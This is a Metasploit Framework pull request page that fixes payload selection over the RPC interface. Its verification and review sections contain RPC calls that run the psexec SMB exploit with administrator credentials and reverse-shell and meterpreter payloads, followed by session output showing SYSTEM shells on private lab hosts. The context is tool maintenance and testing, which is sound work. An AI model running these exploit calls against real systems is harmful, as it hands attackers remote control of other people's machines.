Fix broken payload selection for metasploit rpc #17679

adfoster-r7 · 2023-02-21T11:07:01Z

Relates to #17649
Relates to #17677
Continuation of #17305

Fix broken payload selection for Metasploit RPC

Verification

Create an RPC server:

ruby msfrpcd -U user -P pass -f

Connect a client:

ruby msfrpc -U user -P pass -a 127.0.0.1

Run the metasploit module with a payload specified, verify a valid session:

>> rpc.call('module.execute', 'exploit', 'exploit/windows/smb/psexec', {"RHOSTS" => "192.168.123.13", "TARGET" => 2, "PAYLOAD" => "windows/shell/reverse_tcp", "LHOST" => "192.168.123.1", "L
PORT" => 5000,  "SMBUSER" => "Administrator", "SMBPASS" => "p4$$w0rd"})
=> {"job_id"=>0, "uuid"=>"hhnm8ixl"}
>> rpc.call('session.list')
=> 
{1=>
  {"type"=>"shell",
   "tunnel_local"=>"192.168.123.1:5000",
   "tunnel_peer"=>"192.168.123.13:60896",
   "via_exploit"=>"exploit/windows/smb/psexec",
   "via_payload"=>"payload/windows/shell/reverse_tcp", <------------
   "desc"=>"Command shell",
   "info"=>"",
   "workspace"=>"false",
   "session_host"=>"192.168.123.13",
   "session_port"=>445,
   "target_host"=>"192.168.123.13",
   "username"=>"adfoster",
   "uuid"=>"wwh9s2ac",
   "exploit_uuid"=>"hhnm8ixl",
   "routes"=>"",
   "arch"=>""}}

Run the metasploit module without a payload specified, verify a valid session:

>> rpc.call('module.execute', 'exploit', 'exploit/windows/smb/psexec', {"RHOSTS" => "192.168.123.13", "LHOST" => "192.168.123.1", "LPORT" => 5000,  "SMBUSER" => "Administrator", "SMBPASS" =
> "p4$$w0rd"})
=> {"job_id"=>1, "uuid"=>"xskffj25"}
>> rpc.call('session.list')
=> 
{2=>
  {"type"=>"meterpreter",
   "tunnel_local"=>"192.168.123.1:5000",
   "tunnel_peer"=>"192.168.123.13:60897",
   "via_exploit"=>"exploit/windows/smb/psexec",
   "via_payload"=>"payload/windows/meterpreter/reverse_tcp", <---------
   "desc"=>"Meterpreter",
   "info"=>"NT AUTHORITY\\SYSTEM @ DC3",
   "workspace"=>"false",
   "session_host"=>"192.168.123.13",
   "session_port"=>445,
   "target_host"=>"192.168.123.13",
   "username"=>"adfoster",
   "uuid"=>"ltol2fib",
   "exploit_uuid"=>"xskffj25",
   "routes"=>"",
   "arch"=>"x86",
   "platform"=>"windows"}}

jheysel-r7 · 2023-02-27T20:20:44Z

Looks good, testing checks out 🚀

➜  metasploit-framework git:(land-17679) ✗ ruby msfrpc -U user -P pass -a 127.0.0.1
[*] The 'rpc' object holds the RPC client interface
[*] Use rpc.call('group.command') to make RPC calls

>> rpc.call('module.execute', 'exploit', 'exploit/windows/smb/psexec', {"RHOSTS" => "172.16.199.235", "TARGET" => 2, "PAYLOAD" => "windows/shell/reverse_tcp", "LHOST" => "172.16.1
99.1", "LPORT" => 5000,  "SMBUSER" => "Administrator", "SMBPASS" => "N0tpassword!"})
=> {"job_id"=>0, "uuid"=>"2nwbt9vn"}
>> rpc.call('session.list')
=>
{1=>
  {"type"=>"shell",
   "tunnel_local"=>"172.16.199.1:5000",
   "tunnel_peer"=>"172.16.199.235:50665",
   "via_exploit"=>"exploit/windows/smb/psexec",
   "via_payload"=>"payload/windows/shell/reverse_tcp",
   "desc"=>"Command shell",
   "info"=>"\nShell Banner:\nMicrosoft Windows [Version 10.0.17763.107]\n-----\n          ",
   "workspace"=>"false",
   "session_host"=>"172.16.199.235",
   "session_port"=>445,
   "target_host"=>"172.16.199.235",
   "username"=>"jheysel",
   "uuid"=>"vep2le6q",
   "exploit_uuid"=>"2nwbt9vn",
   "routes"=>"",
   "arch"=>"x86"}}
>> rpc.call('module.execute', 'exploit', 'exploit/windows/smb/psexec', {"RHOSTS" => "172.16.199.235", "TARGET" => 2, "LHOST" => "172.16.199.1", "LPORT" => 5000,  "SMBUSER" => "Adm
inistrator", "SMBPASS" => "N0tpassword!"})
=> {"job_id"=>1, "uuid"=>"pqgsmel8"}
>> rpc.call('session.list')
=>
{1=>
  {"type"=>"shell",
   "tunnel_local"=>"172.16.199.1:5000",
   "tunnel_peer"=>"172.16.199.235:50665",
   "via_exploit"=>"exploit/windows/smb/psexec",
   "via_payload"=>"payload/windows/shell/reverse_tcp",
   "desc"=>"Command shell",
   "info"=>"\nShell Banner:\nMicrosoft Windows [Version 10.0.17763.107]\n-----\n          ",
   "workspace"=>"false",
   "session_host"=>"172.16.199.235",
   "session_port"=>445,
   "target_host"=>"172.16.199.235",
   "username"=>"jheysel",
   "uuid"=>"vep2le6q",
   "exploit_uuid"=>"2nwbt9vn",
   "routes"=>"",
   "arch"=>"x86"},
 2=>
  {"type"=>"meterpreter",
   "tunnel_local"=>"172.16.199.1:5000",
   "tunnel_peer"=>"172.16.199.235:50669",
   "via_exploit"=>"exploit/windows/smb/psexec",
   "via_payload"=>"payload/windows/meterpreter/reverse_tcp",
   "desc"=>"Meterpreter",
   "info"=>"NT AUTHORITY\\SYSTEM @ WIN-FDV8QFUMFP7",
   "workspace"=>"false",
   "session_host"=>"172.16.199.235",
   "session_port"=>445,
   "target_host"=>"172.16.199.235",
   "username"=>"jheysel",
   "uuid"=>"mf4teda9",
   "exploit_uuid"=>"pqgsmel8",
   "routes"=>"",
   "arch"=>"x86",
   "platform"=>"windows"}}

jheysel-r7 · 2023-02-27T20:21:12Z

Release Notes

This PR fixes the broken payload selection for Metasploit RPC

Fix broken payload selection for metasploit rpc

239bc02

adfoster-r7 mentioned this pull request Feb 21, 2023

MSFRPCD returns Job_ID nill. But when trying manual exploitation, it works. #17649

Closed

gwillcox-r7 added library bug labels Feb 21, 2023

jheysel-r7 self-assigned this Feb 27, 2023

jheysel-r7 merged commit ac3e84d into rapid7:master Feb 27, 2023

jheysel-r7 added the rn-fix release notes fix label Feb 27, 2023

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Fix broken payload selection for metasploit rpc #17679

Fix broken payload selection for metasploit rpc #17679

adfoster-r7 commented Feb 21, 2023 •

edited

jheysel-r7 commented Feb 27, 2023

jheysel-r7 commented Feb 27, 2023

Fix broken payload selection for metasploit rpc #17679

Fix broken payload selection for metasploit rpc #17679

Conversation

adfoster-r7 commented Feb 21, 2023 • edited

Verification

jheysel-r7 commented Feb 27, 2023

jheysel-r7 commented Feb 27, 2023

Release Notes

adfoster-r7 commented Feb 21, 2023 •

edited